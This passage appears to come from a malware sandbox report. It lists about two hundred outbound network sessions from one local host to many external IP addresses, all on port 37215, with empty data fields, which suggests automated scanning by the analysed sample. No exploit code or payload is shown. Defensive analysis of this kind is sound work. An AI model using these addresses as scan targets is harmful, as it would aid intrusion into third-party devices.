                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10826192.168.2.1336990197.133.40.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10827192.168.2.1347160187.211.26.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10828192.168.2.1337966197.9.144.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10829192.168.2.1332966197.138.55.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10830192.168.2.1353428197.21.72.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10831192.168.2.134872041.217.207.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10832192.168.2.1345840197.121.214.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10833192.168.2.1356796197.58.201.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10834192.168.2.1350794138.28.99.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10835192.168.2.1352030197.5.47.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10836192.168.2.1344294157.149.39.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10837192.168.2.1351504197.225.161.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10838192.168.2.135623241.148.62.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10839192.168.2.1351446138.185.72.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10840192.168.2.1353232197.212.193.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10841192.168.2.133278841.166.224.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10842192.168.2.1335336157.72.204.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10843192.168.2.133511641.247.239.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10844192.168.2.1334372197.19.155.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10845192.168.2.1357858100.63.140.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10846192.168.2.136036641.242.164.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10847192.168.2.1344278197.215.4.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10848192.168.2.135427241.61.97.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10849192.168.2.1349758197.151.237.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10850192.168.2.1344738124.71.177.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10851192.168.2.133326441.183.154.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10852192.168.2.136039241.83.106.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10853192.168.2.1353614157.79.71.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10854192.168.2.1351706197.107.46.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10855192.168.2.1357988157.120.93.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10856192.168.2.1334796197.187.126.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10857192.168.2.1354178197.38.106.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10858192.168.2.134956680.25.20.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10859192.168.2.133893241.175.39.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10860192.168.2.1333940157.189.217.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10861192.168.2.1360410157.14.38.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10862192.168.2.1357366197.227.66.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10863192.168.2.1344572197.161.251.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10864192.168.2.1339550197.165.242.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10865192.168.2.1338514197.56.57.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10866192.168.2.135472041.14.87.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10867192.168.2.135836652.2.185.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10868192.168.2.134519241.16.159.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10869192.168.2.134867641.73.166.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10870192.168.2.1332822197.99.145.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10871192.168.2.1356972197.156.124.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10872192.168.2.134773041.152.132.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10873192.168.2.1350820197.17.218.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10874192.168.2.135734441.5.121.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10875192.168.2.134609841.178.15.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10876192.168.2.135001041.137.227.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10877192.168.2.1341806157.150.62.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10878192.168.2.134457841.109.217.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10879192.168.2.1349940157.8.162.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10880192.168.2.1348464157.178.165.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10881192.168.2.133561241.243.160.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10882192.168.2.1338668157.105.175.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10883192.168.2.1360074197.74.3.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10884192.168.2.1357664130.17.169.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10885192.168.2.133319253.233.122.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10886192.168.2.1346072157.46.246.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10887192.168.2.1352364218.212.154.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10888192.168.2.1348210197.52.45.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10889192.168.2.134514083.178.92.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10890192.168.2.135954441.148.26.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10891192.168.2.1356650161.210.63.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10892192.168.2.1358340157.253.74.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10893192.168.2.1340660157.23.233.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10894192.168.2.134746241.154.240.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10895192.168.2.1334222212.103.198.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10896192.168.2.135173041.188.79.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10897192.168.2.1342724157.32.248.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10898192.168.2.1353840155.180.61.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10899192.168.2.1355556213.59.125.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10900192.168.2.1349090161.59.160.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10901192.168.2.135908841.148.204.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10902192.168.2.134860041.61.22.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10903192.168.2.1355852197.41.124.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10904192.168.2.133654241.128.171.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10905192.168.2.1354318157.76.101.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10906192.168.2.1359376157.12.172.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10907192.168.2.1333886197.204.86.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10908192.168.2.1339086195.81.163.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10909192.168.2.1359588142.134.24.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10910192.168.2.1349482197.182.253.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10911192.168.2.1345778197.88.83.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10912192.168.2.1342964197.31.219.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10913192.168.2.133665241.157.102.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10914192.168.2.1350468166.138.215.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10915192.168.2.135336641.88.97.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10916192.168.2.1335648157.167.101.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10917192.168.2.134681041.15.101.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10918192.168.2.1358400157.33.86.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10919192.168.2.1360588157.39.165.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10920192.168.2.1359670157.190.140.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10921192.168.2.135254241.104.88.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10922192.168.2.1349140157.100.43.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10923192.168.2.1357014197.20.94.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10924192.168.2.133481041.228.66.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10925192.168.2.1344162146.151.32.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10926192.168.2.1349402177.104.223.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10927192.168.2.1345222197.104.57.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10928192.168.2.1350752197.58.90.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10929192.168.2.135986841.137.38.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10930192.168.2.134151241.157.151.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10931192.168.2.1358980197.232.40.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10932192.168.2.136005041.180.247.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10933192.168.2.1349932157.102.51.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10934192.168.2.1356098157.183.217.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10935192.168.2.1336574157.217.15.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10936192.168.2.1339414134.92.150.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10937192.168.2.1356810168.41.72.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10938192.168.2.1348988197.185.37.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10939192.168.2.1333642197.177.114.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10940192.168.2.1352318197.189.189.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10941192.168.2.1339350157.170.243.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10942192.168.2.133703041.46.218.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10943192.168.2.135508053.51.46.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10944192.168.2.1335822222.136.187.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10945192.168.2.1358662212.46.142.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10946192.168.2.134059068.176.174.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10947192.168.2.1358336157.151.255.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10948192.168.2.1333852157.207.18.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10949192.168.2.135284841.120.177.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10950192.168.2.134900041.128.145.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10951192.168.2.1349586157.171.65.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10952192.168.2.1344894197.168.176.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10953192.168.2.1360806202.154.22.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10954192.168.2.1343214197.88.149.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10955192.168.2.135705041.0.69.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10956192.168.2.1351496121.49.224.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10957192.168.2.1335746197.93.177.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10958192.168.2.1352136197.254.10.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10959192.168.2.1357278160.87.223.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10960192.168.2.133648241.242.69.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10961192.168.2.133767641.179.87.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10962192.168.2.1349340201.210.253.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10963192.168.2.135064877.25.14.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10964192.168.2.135005441.157.203.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10965192.168.2.134597841.136.44.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10966192.168.2.1350972157.150.194.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10967192.168.2.136080841.135.104.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10968192.168.2.1343130197.233.206.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10969192.168.2.134225641.191.49.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10970192.168.2.135444241.116.221.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10971192.168.2.133889241.183.212.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10972192.168.2.133429041.209.232.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10973192.168.2.1341432157.227.194.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10974192.168.2.1344262157.101.146.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10975192.168.2.1353742197.126.126.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10976192.168.2.1334416107.13.243.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10977192.168.2.1334950197.31.131.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10978192.168.2.135936041.10.185.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10979192.168.2.1355762157.14.168.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10980192.168.2.1336966157.76.62.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10981192.168.2.1349086197.25.8.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10982192.168.2.1344910194.10.131.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10983192.168.2.1344140204.60.247.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10984192.168.2.134059641.60.101.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10985192.168.2.1358222197.225.118.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10986192.168.2.1358198157.140.255.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10987192.168.2.13360629.69.15.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10988192.168.2.133486841.193.31.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10989192.168.2.1353944157.58.129.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10990192.168.2.135797641.254.25.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10991192.168.2.1348972156.84.55.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10992192.168.2.135588041.7.185.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10993192.168.2.135637841.148.166.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10994192.168.2.134110241.114.238.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10995192.168.2.1333452197.187.239.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10996192.168.2.1336726157.226.85.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10997192.168.2.1353944157.47.108.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10998192.168.2.1347900197.50.25.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10999192.168.2.1340278195.97.134.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11000192.168.2.1341454157.220.20.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11001192.168.2.1357168218.252.172.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11002192.168.2.1360594197.183.23.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11003192.168.2.134853649.25.232.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11004192.168.2.135989298.2.239.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11005192.168.2.134689041.64.169.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11006192.168.2.1340062111.4.120.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11007192.168.2.133457036.148.144.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11008192.168.2.1357974197.177.50.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11009192.168.2.1351376157.241.140.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11010192.168.2.1351728197.24.39.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11011192.168.2.1358890197.254.47.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11012192.168.2.1339032197.52.32.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11013192.168.2.1341610192.67.147.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11014192.168.2.1352230197.168.60.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11015192.168.2.1344774157.24.145.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11016192.168.2.135712841.162.112.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11017192.168.2.134812647.193.64.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11018192.168.2.133450863.23.216.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11019192.168.2.134856041.53.118.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11020192.168.2.134540041.162.161.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11021192.168.2.1333160157.188.206.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11022192.168.2.1359232197.130.212.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11023192.168.2.135694041.105.172.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11024192.168.2.134350041.182.78.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11025192.168.2.135818641.234.230.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11026192.168.2.1337002197.194.46.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11027192.168.2.1348578197.242.146.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11028192.168.2.133583641.15.207.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11029192.168.2.135655641.165.117.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11030192.168.2.133791441.100.102.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11031192.168.2.1340926197.191.97.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11032192.168.2.1333676103.124.175.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11033192.168.2.1343568197.228.109.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11034192.168.2.134314019.236.124.23737215
                                                  TimestampBytes transferredDirectionData


